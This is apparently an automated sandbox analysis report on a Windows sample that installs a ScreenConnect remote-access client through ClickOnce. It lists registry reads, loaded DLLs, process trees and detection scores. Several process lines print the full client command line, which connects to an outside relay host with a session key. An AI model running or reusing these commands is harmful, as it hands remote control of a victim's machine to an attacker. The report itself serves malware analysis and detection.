Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security

Reads the System eventlog

Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

System Summary

Creates files inside the system directory

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Detected potential crypto function

Source: C:\Users\user\Desktop\mrKs8EKXbz.exe	Code function: 1_2_0002A495	1_2_0002A495
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD34661538	2_2_00007FFD34661538
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD3467D5B5	2_2_00007FFD3467D5B5
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD34672768	2_2_00007FFD34672768
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD34683085	2_2_00007FFD34683085
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD3468B155	2_2_00007FFD3468B155
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD3467328D	2_2_00007FFD3467328D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD3466F3C5	2_2_00007FFD3466F3C5
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD34685D81	2_2_00007FFD34685D81
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD3466AEF5	2_2_00007FFD3466AEF5
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD346797B8	2_2_00007FFD346797B8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD346811D3	2_2_00007FFD346811D3
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD34661211	2_2_00007FFD34661211
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD346732FE	2_2_00007FFD346732FE
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD3466602A	2_2_00007FFD3466602A
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD3467C422	9_2_00007FFD3467C422
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD3466052F	12_2_00007FFD3466052F
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD3465ED6E	12_2_00007FFD3465ED6E
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD34657138	12_2_00007FFD34657138
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD3465BA90	12_2_00007FFD3465BA90
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD3466CAF0	12_2_00007FFD3466CAF0
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD34659FF9	12_2_00007FFD34659FF9
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD346510CF	12_2_00007FFD346510CF
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD346510D7	12_2_00007FFD346510D7
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD3465D240	12_2_00007FFD3465D240
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD34965E1B	12_2_00007FFD34965E1B
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD34965761	12_2_00007FFD34965761
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD34965974	12_2_00007FFD34965974
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD3496000A	12_2_00007FFD3496000A

One or more processes crash

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3540 -ip 3540

Sample file is different than original file name gathered from version info

Source: mrKs8EKXbz.exe, 00000001.00000002.2182851110.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameclr.dllT vs mrKs8EKXbz.exe

Uses 32bit PE files

Source: mrKs8EKXbz.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: ScreenConnect.WindowsBackstageShell.exe.2.dr, PopoutPanelTaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe.2.dr, ProgramTaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe.2.dr, TaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe0.2.dr, PopoutPanelTaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe0.2.dr, ProgramTaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe0.2.dr, TaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'

Source: ScreenConnect.Windows.dll.2.dr, WindowsExtensions.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: ScreenConnect.Windows.dll.2.dr, WindowsExtensions.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: ScreenConnect.Windows.dll.2.dr, WindowsExtensions.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: ScreenConnect.ClientService.dll.2.dr, WindowsLocalUserExtensions.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)

Source: classification engine

Classification label: mal63.evad.winEXE@18/74@2/2

Source: C:\Users\user\Desktop\mrKs8EKXbz.exe

1_2_00021000

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

File created: C:\Users\user\AppData\Local\Deployment

Jump to behavior

Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3540
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

File created: C:\Users\user\AppData\Local\Temp\Deployment

Jump to behavior

Source: C:\Users\user\Desktop\mrKs8EKXbz.exe

Command line argument: dfshim

1_2_00021000

Source: mrKs8EKXbz.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\mrKs8EKXbz.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: mrKs8EKXbz.exe	Virustotal: Detection: 8%
Source: mrKs8EKXbz.exe	ReversingLabs: Detection: 18%

Source: unknown	Process created: C:\Users\user\Desktop\mrKs8EKXbz.exe "C:\Users\user\Desktop\mrKs8EKXbz.exe"
Source: C:\Users\user\Desktop\mrKs8EKXbz.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3540 -ip 3540
Source: C:\Users\user\Desktop\mrKs8EKXbz.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3540 -s 724
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe"
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=qpkl23.zapto.org&p=8041&s=c75cf581-c081-4bd7-96da-5933e5da1d56&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
Source: unknown	Process created: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=qpkl23.zapto.org&p=8041&s=c75cf581-c081-4bd7-96da-5933e5da1d56&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe" "RunRole" "5907bb67-d556-434c-b64e-e4ceba678cb8" "User"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: C:\Users\user\Desktop\mrKs8EKXbz.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3540 -ip 3540	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3540 -s 724	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=qpkl23.zapto.org&p=8041&s=c75cf581-c081-4bd7-96da-5933e5da1d56&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe" "RunRole" "5907bb67-d556-434c-b64e-e4ceba678cb8" "User"

Source: C:\Users\user\Desktop\mrKs8EKXbz.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mrKs8EKXbz.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\mrKs8EKXbz.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mrKs8EKXbz.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\mrKs8EKXbz.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\mrKs8EKXbz.exe	Section loaded: dfshim.dll	Jump to behavior
Source: C:\Users\user\Desktop\mrKs8EKXbz.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\mrKs8EKXbz.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\mrKs8EKXbz.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\mrKs8EKXbz.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\mrKs8EKXbz.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\mrKs8EKXbz.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\mrKs8EKXbz.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\mrKs8EKXbz.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dfshim.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: webio.dll	Jump to behavior
